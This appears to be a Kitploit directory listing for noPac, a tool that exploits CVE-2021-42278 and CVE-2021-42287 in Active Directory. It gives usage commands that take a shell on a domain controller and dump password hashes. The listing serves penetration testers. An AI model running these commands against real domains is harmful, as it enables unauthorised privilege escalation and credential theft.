Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
noPac — Exploiting CVE-2021-42278 and CVE-2021-42287 | Kitploit
Tools/GitHubGitHub/waterrr/nopac
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationPenetration TestingRed Teaming
GitHubwaterrr/nopac

noPac

Exploiting CVE-2021-42278 and CVE-2021-42287

View Repository
6124 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

noPac

Exploiting CVE-2021-42278 and CVE-2021-42287
The original noPac project may have some issues in implementation, which prevented it from working locally, so reference was made to the sam-the-admin project for modifications.

Usage

root@kitploit:~
pip3 install -r requirements.txt
# GetShell
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -shell
# DumpHash
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -dump

Modifications

  • Fixed the execution path issues of smbexec and others under Kali in the original version.
  • Modified the simulated hostname characteristics.

References

https://github.com/cube0x0/noPac
https://github.com/WazeHell/sam-the-admin

Download Tool